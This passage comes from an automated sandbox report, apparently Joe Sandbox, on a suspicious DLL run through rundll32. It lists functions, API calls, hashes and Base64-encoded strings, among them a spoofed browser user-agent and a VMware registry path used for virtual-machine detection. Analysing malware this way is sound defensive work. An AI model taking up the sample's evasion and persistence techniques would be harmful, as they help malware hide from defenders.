                                                                                                                                                                          • String ID: TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1
                                                                                                                                                                          • API String ID: 483802873-1756078650
                                                                                                                                                                          • Opcode ID: cef4efffd429ddee3212c6e039c19f196e3efd6be34b444d7ff284c3b8751f5e
                                                                                                                                                                          • Instruction ID: a5547eeb69050645aed9f260844fde4d5ca2e3288b24f94df7381202492e8511
                                                                                                                                                                          • Opcode Fuzzy Hash: cef4efffd429ddee3212c6e039c19f196e3efd6be34b444d7ff284c3b8751f5e
                                                                                                                                                                          • Instruction Fuzzy Hash: 5821C2B5D0024DBAEF11DA55CC85DDF3BBDDB852D4F20806AF608A2045EA30AA918674
                                                                                                                                                                          Function 10024849 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                          • String ID: R2V0Q3Vyc29yUG9z
                                                                                                                                                                          • API String ID: 2422867632-1626527068
                                                                                                                                                                          • Opcode ID: 07f024186378984c7e9d0841217f5ef98467c514b2f4d500de2484e669f52904
                                                                                                                                                                          • Instruction ID: 2fbd12757a924457875e578167f5cd40fc8d60cd886180bfe36f56dc21c14199
                                                                                                                                                                          • Opcode Fuzzy Hash: 07f024186378984c7e9d0841217f5ef98467c514b2f4d500de2484e669f52904
                                                                                                                                                                          • Instruction Fuzzy Hash: 31E0867A008241AFD326DB80D0C5DCFB7E3FFC5200F549E09B55906209D77461948696
                                                                                                                                                                          Function 1000821A Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID: C:\Program Files
                                                                                                                                                                          • API String ID: 3472027048-1387799010
                                                                                                                                                                          • Opcode ID: 2291930864ef3eff619ea6b28b2f57ae492b4b10baed7b5fa4176fcec38f0e0e
                                                                                                                                                                          • Instruction ID: 299bb4f2f6da416194b6909443d794439fa835322e1b0a08914665dd4d695e90
                                                                                                                                                                          • Opcode Fuzzy Hash: 2291930864ef3eff619ea6b28b2f57ae492b4b10baed7b5fa4176fcec38f0e0e
                                                                                                                                                                          • Instruction Fuzzy Hash: FCF04C769056A6A9F602DBA40CC15CF7769FF026A4B610022F940BF146D7F59A4243E1
                                                                                                                                                                          Function 100327F4 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                          • Opcode ID: 80b38412ebeb4392f369f9e5b48e7952e28bd5fe5a6ec20ba06ae18a1de95141
                                                                                                                                                                          • Instruction ID: bdb3dc2fd668fa793b300cdb31c8481bf694da493985f631d8d3068bb7669da4
                                                                                                                                                                          • Opcode Fuzzy Hash: 80b38412ebeb4392f369f9e5b48e7952e28bd5fe5a6ec20ba06ae18a1de95141
                                                                                                                                                                          • Instruction Fuzzy Hash: ABF06D7A00C345EEC212EF60804108DBBE3EFC4311F124D1CB4842F312C775B9559B92
                                                                                                                                                                          Function 1002A39D Relevance: 1.5, APIs: 1, Instructions: 31threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                          • Opcode ID: 3313878219ba196864bb5070412ff370055176ec33e6ab7f3a10a2e0d360e463
                                                                                                                                                                          • Instruction ID: 1cd95c2412de7701bec3f23c5cc0e67d7971dbdd805010661a28f4a1fc844042
                                                                                                                                                                          • Opcode Fuzzy Hash: 3313878219ba196864bb5070412ff370055176ec33e6ab7f3a10a2e0d360e463
                                                                                                                                                                          • Instruction Fuzzy Hash: 87F03A7A40C715EEC302EFA1918109EBBE3EFC8742F228C5DB4842B311C775B995AB52
                                                                                                                                                                          Function 1000406C Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D83,?,10006D83,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                          • Opcode ID: 4468d0dea670f9f99cf7b1750d46a62ef963be4bfffbb1809d42d87fb691d60c
                                                                                                                                                                          • Instruction ID: c6ba46e0708592c8b7cfd3349602d25f74c43e1f0397a81e521459d35c3fc00e
                                                                                                                                                                          • Opcode Fuzzy Hash: 4468d0dea670f9f99cf7b1750d46a62ef963be4bfffbb1809d42d87fb691d60c
                                                                                                                                                                          • Instruction Fuzzy Hash: B2D09B3200014EBBCF025F81DD058DA3F6AFB0C2A9B068254FA1825430C776D9B1AB91
                                                                                                                                                                          Function 1003281C Relevance: 1.5, APIs: 1, Instructions: 12threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                          • Opcode ID: ad12984256e560304a239f9478dfc727c0219507a1d132967d44bc02133bf382
                                                                                                                                                                          • Instruction ID: 4dea5d81ded3fe389b5bfba3f71a04f2e4ed074394676f8df1518e5c184aca23
                                                                                                                                                                          • Opcode Fuzzy Hash: ad12984256e560304a239f9478dfc727c0219507a1d132967d44bc02133bf382
                                                                                                                                                                          • Instruction Fuzzy Hash: 68D0127C80C766EDC312FFB1408205D7AA1DE44742F064D6DB4802E302CA74FA455B93
                                                                                                                                                                          Function 10003F0A Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InternetOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2038078732-0
                                                                                                                                                                          • Opcode ID: 5ada80b7e0307531ecad8728767aece14519078488250715ec51feb695703235
                                                                                                                                                                          • Instruction ID: 9d53eed81376549a634a4aefa5c6fcceb58af181e7056f747c2cc6b1af68d793
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ada80b7e0307531ecad8728767aece14519078488250715ec51feb695703235
                                                                                                                                                                          • Instruction Fuzzy Hash: FDC0013200020EFBCF025FC1EC058DA7F2AFB082A0B008010FA1806031C733D971AB95
                                                                                                                                                                          Function 100040BA Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(000000FF,?,?,00000000,?,?,100044B6,80000000,00000000,00000000,000F003F,100152B0,QXBwbGljYXRpb25zXFxWTXdhcmVIb3N0T3Blbi5leGU=,?,10023F6B,10038DE4), ref: 100040CC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Open
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                          • Opcode ID: 004c0763fc38ed271ff131682deff9bc923b77ca4c8158dd99e58b07c25c9ea7
                                                                                                                                                                          • Instruction ID: 77985ed2f1b0b55fab5b796168f91cb690cc609832010200395dc5096bea9058
                                                                                                                                                                          • Opcode Fuzzy Hash: 004c0763fc38ed271ff131682deff9bc923b77ca4c8158dd99e58b07c25c9ea7
                                                                                                                                                                          • Instruction Fuzzy Hash: 03C0013200020EFBCF025F81EC058DA3F6AFB082A1B008010FA1805030C773D9B1AB91
                                                                                                                                                                          Function 10003ECE Relevance: 1.5, APIs: 1, Instructions: 5synchronizationCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateMutexA.KERNEL32(?,?,?,10006AC6,00000000,00000000,0x5d65r455f,?,00000202,?), ref: 10003EDA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateMutex
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1964310414-0
                                                                                                                                                                          • Opcode ID: 3ad23f1a89e44850972ba528bcc2489416e04d2579e5b050aa8df1dc9d665d66
                                                                                                                                                                          • Instruction ID: 3c48f8fa6a8358b664fd3951d3b8fac3706ee28bfef3f7cf4a1830814139b7d7
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ad23f1a89e44850972ba528bcc2489416e04d2579e5b050aa8df1dc9d665d66
                                                                                                                                                                          • Instruction Fuzzy Hash: 07B00235408211BFDF025B50DD5480ABFA2BB88325F14C958F1A941031C7328424EF42
                                                                                                                                                                          Function 10003FF7 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206614724.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206649187.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206729654.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206769279.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: NamePathShort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1295925010-0
                                                                                                                                                                          • Opcode ID: 2d4668a70104dc81522273e86be88e5be1766fadaf37d1f10af6586c2f1dcbe7
                                                                                                                                                                          • Instruction ID: 67191f8e8a6808ebc338456d7226a707f4b3656e6c1bcc3e14e030810b1eb0a7
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d4668a70104dc81522273e86be88e5be1766fadaf37d1f10af6586c2f1dcbe7
                                                                                                                                                                          • Instruction Fuzzy Hash: 03B0097A50A210BFDF025B91DE4880ABBA2BB88321F10C958F2A940131C7328520EB02
                                                                                                                                                                          Function 10004104 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000000), ref: 1000410C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.3206115899.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000004.00000002.3206084794.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206171992.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206325037.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206361315.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206463224.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206509029.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206545463.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000004.00000002.3206576498.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
